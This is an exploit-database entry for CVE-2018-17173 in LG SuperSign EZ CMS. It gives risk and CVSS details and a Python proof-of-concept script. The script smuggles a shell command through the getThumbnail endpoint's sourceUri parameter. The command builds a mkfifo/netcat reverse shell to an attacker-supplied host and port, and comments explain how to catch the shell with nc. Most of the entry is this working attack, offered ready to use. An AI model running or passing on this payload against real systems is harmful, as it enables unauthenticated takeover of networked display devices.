LG SuperSign EZ CMS 2.5 Remote Code Execution

2018.09.25
Risk: High
Local: No
Remote: Yes
CWE: CWE-94


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: LG SuperSign EZ CMS 2.5 - Remote Code Execution # Date: 2018-09-18 # Exploit Author: Alejandro Fanjul # Vendor Homepage:https://www.lg.com # Software Link: https://www.lg.com/ar/software-lg-supersign # Version: SuperSignEZ 1.3 # Tested on: LG WebOS 3.10 # CVE : CVE-2018-17173 # 1. Description # LG SuperSignEZ CMS, that many LG SuperSign TVs have built in, is prone # to remote code execution due to an improper parameter handling # 2. Proof of concept # Code to exploit the vulnerability import requests from argparse import ArgumentParser parser = ArgumentParser(description="SuperSign RCE") parser.add_argument("-t", "--target", dest="target", help="Target") parser.add_argument("-l", "--lhost", dest="lhost", help="lhost") parser.add_argument("-p", "--lport", dest="lport", help="lport") args = parser.parse_args() #LG SupersignEZ always run in port 9080, so in target you must type: #LG_SuperSign_IP:9080 #Example #supersign-exploit.py -t LG_SuperSign_IP:9080 -l attacker_ip -p 4444 #In the attacker machine wait for the shell with nc -lvp 4444 #enjoy your shell s = requests.get('[http://'+](http://%27+/) str(args.target).replace('\n', '') +'/qsr_server/device/getThumbnail?sourceUri=\'%20-;rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20'+str(args.lhost)+'%20'+str(args.lport)+'%20%3E%2Ftmp%2Ff;\'&targetUri=%2Ftmp%2Fthumb%2Ftest.jpg&mediaType=image&targetWidth=400&targetHeight=400&scaleType=crop&_=1537275717150')


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top